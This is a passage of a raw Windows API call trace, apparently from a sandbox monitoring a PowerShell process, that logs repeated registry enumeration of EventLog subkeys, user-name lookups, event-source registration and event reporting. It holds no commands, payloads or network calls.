out: lpName="Windows PowerShell", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x31c) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x32c) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x330) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.141] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x334) returned 0x0 [0053.141] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.142] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x338) returned 0x0 [0053.142] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.142] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x33c) returned 0x0 [0053.142] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.142] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x5 [0053.159] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x340) returned 0x0 [0053.160] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x0) returned 0x2 [0053.160] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x344) returned 0x0 [0053.160] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea08 | out: phkResult=0x14ea08*=0x348) returned 0x0 [0053.160] RegCloseKey (hKey=0x348) returned 0x0 [0053.160] RegCloseKey (hKey=0x300) returned 0x0 [0053.161] RegCloseKey (hKey=0x344) returned 0x0 [0053.170] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.171] GetLastError () returned 0x3 [0053.171] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9bc | out: phkResult=0x14e9bc*=0x34c) returned 0x0 [0053.213] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea24, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea24*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea40, 
lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.214] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: 
lpName="Windows PowerShell", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x350) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x354) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x358) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x35c) returned 0x0 [0053.215] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.215] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x360) returned 0x0 [0053.216] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.216] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x364) returned 0x0 [0053.216] RegOpenKeyExW (in: hKey=0x364, 
lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.216] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x5 [0053.218] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x368) returned 0x0 [0053.218] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.218] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x36c) returned 0x0 [0053.218] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x370) returned 0x0 [0053.218] RegCloseKey (hKey=0x370) returned 0x0 [0053.218] RegCloseKey (hKey=0x34c) returned 0x0 [0053.218] RegCloseKey (hKey=0x36c) returned 0x0 [0053.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9bc | out: phkResult=0x14e9bc*=0x36c) returned 0x0 [0053.218] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea24, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea24*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea20*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: 
lpName="Application", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.219] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, 
lpftLastWriteTime=0x0) returned 0x0 [0053.220] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea40, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ea40, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x34c) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x370) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x374) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x378) returned 0x0 [0053.220] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.220] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x37c) returned 0x0 [0053.221] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 
[0053.221] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x380) returned 0x0 [0053.221] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.221] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x5 [0053.223] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x384) returned 0x0 [0053.223] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x0) returned 0x2 [0053.223] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x388) returned 0x0 [0053.223] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9ec | out: phkResult=0x14e9ec*=0x38c) returned 0x0 [0053.223] RegCloseKey (hKey=0x38c) returned 0x0 [0053.223] RegCloseKey (hKey=0x36c) returned 0x0 [0053.224] RegCloseKey (hKey=0x388) returned 0x0 [0053.224] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9b0 | out: phkResult=0x14e9b0*=0x388) returned 0x0 [0053.224] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea18, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea14, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea18*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea14*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, 
lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.224] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: 
hKey=0x388, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea34, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14ea34, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.225] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x36c) returned 0x0 [0053.225] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.225] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x38c) returned 0x0 [0053.225] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x390) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x394) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: 
phkResult=0x14e9e0*=0x398) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x39c) returned 0x0 [0053.226] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.226] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x5 [0053.228] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x3a0) returned 0x0 [0053.228] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x0) returned 0x2 [0053.228] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x3a4) returned 0x0 [0053.228] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9e0 | out: phkResult=0x14e9e0*=0x3a8) returned 0x0 [0053.229] RegCloseKey (hKey=0x3a8) returned 0x0 [0053.229] RegCloseKey (hKey=0x388) returned 0x0 [0053.229] RegCloseKey (hKey=0x3a4) returned 0x0 [0053.233] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4390004 [0053.235] GetLastError () returned 0x0 [0053.236] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29af62c*="WSMan", lpRawData=0x29af4d4) returned 1 [0053.239] GetLastError () returned 0x0 [0053.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") 
returned 0x0 [0053.240] GetLastError () returned 0xcb [0053.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.240] GetLastError () returned 0xcb [0053.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.241] GetLastError () returned 0xcb [0053.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.241] GetLastError () returned 0xcb [0053.241] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.241] GetLastError () returned 0xcb [0053.241] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.242] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, 